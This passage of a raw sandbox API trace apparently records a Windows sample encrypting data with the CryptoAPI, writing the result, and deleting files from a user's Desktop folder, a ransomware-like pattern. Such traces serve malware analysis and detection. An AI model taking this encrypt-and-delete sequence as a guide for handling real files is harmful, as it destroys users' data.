lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0107.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0107.192] CryptEncrypt (in: hKey=0x9a47c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0107.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.192] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0107.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.192] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.192] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.192] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.192] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.192] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.192] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0107.193] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0107.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0107.193] CryptEncrypt (in: hKey=0x9a47c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71a18*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71a18*, pdwDataLen=0x8cef60*=0x8) returned 1 [0107.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.193] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.193] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0107.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.193] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0107.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.193] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.193] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0107.193] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.193] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0107.193] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.193] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.193] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0107.194] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.194] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0107.194] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0107.194] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0107.194] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0107.194] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0107.194] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.194] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0107.194] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.194] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.194] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.194] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.194] WriteFile (in: hFile=0x458, lpBuffer=0x2a71898*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a71898*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0107.195] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.195] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.195] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0107.195] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0107.195] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0107.195] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0107.195] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0107.195] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.195] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0107.195] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.195] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0107.195] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0107.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0107.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9a48, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0107.196] CryptDestroyKey (hKey=0x9a47c0) returned 1 [0107.196] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0107.196] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0107.196] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0107.196] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0107.196] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0107.196] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0107.196] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0107.196] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0107.196] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0107.196] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0107.196] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0107.196] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0107.196] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0107.196] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0107.196] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0107.196] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0107.196] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0107.196] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0107.196] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0107.197] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0107.197] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0107.197] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0107.197] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0107.197] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.197] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0107.197] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.197] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0107.197] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.197] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.197] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0107.197] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.197] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0107.197] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.197] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.244] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0107.244] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.244] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0107.244] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0107.244] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0107.244] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0107.245] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0107.245] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.245] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.245] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0107.245] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.245] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0107.245] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0107.245] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0107.245] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0107.245] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0107.245] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0107.245] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0107.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0107.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0107.245] CryptReleaseContext (hProv=0x9bf330, dwFlags=0x0) returned 1 [0107.245] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.245] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.245] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0107.245] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.245] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0107.245] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0107.245] FreeLibrary (hLibModule=0x76390000) returned 1 [0107.246] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.246] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0107.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.246] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.246] CloseHandle (hObject=0x458) returned 1 [0107.247] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.247] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0107.247] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0107.247] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0107.248] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/yi TyUTEx1dVRHalW", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW", lpFilePart=0x8cedf4*="yi TyUTEx1dVRHalW") returned 0x29 [0107.248] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw")) returned 0x10 [0107.248] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9a3b80 [0107.248] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x2451772f, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2451772f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0107.248] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1418d380, ftCreationTime.dwHighDateTime=0x1d5ca0b, ftLastAccessTime.dwLowDateTime=0x9be42560, ftLastAccessTime.dwHighDateTime=0x1d5d165, ftLastWriteTime.dwLowDateTime=0x9be42560, ftLastWriteTime.dwHighDateTime=0x1d5d165, nFileSizeHigh=0x0, nFileSizeLow=0x15674, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="7HlCuwMi.pptx", cAlternateFileName="7HLCUW~1.PPT")) returned 1 [0107.248] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\7HlCuwMi.pptx" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\7hlcuwmi.pptx")) returned 1 [0107.288] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58416d40, ftCreationTime.dwHighDateTime=0x1d5d368, ftLastAccessTime.dwLowDateTime=0x95e58810, ftLastAccessTime.dwHighDateTime=0x1d5d616, ftLastWriteTime.dwLowDateTime=0x95e58810, ftLastWriteTime.dwHighDateTime=0x1d5d616, nFileSizeHigh=0x0, nFileSizeLow=0x171e1, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CZR-hhw59bi.bmp", cAlternateFileName="CZR-HH~1.BMP")) returned 1 [0107.288] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\yi TyUTEx1dVRHalW\\CZR-hhw59bi.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\yi tyutex1dvrhalw\\czr-hhw59bi.bmp")) returned 1 [0107.289] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x242b1fc1, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x242b1fc1, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24370b6b, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, 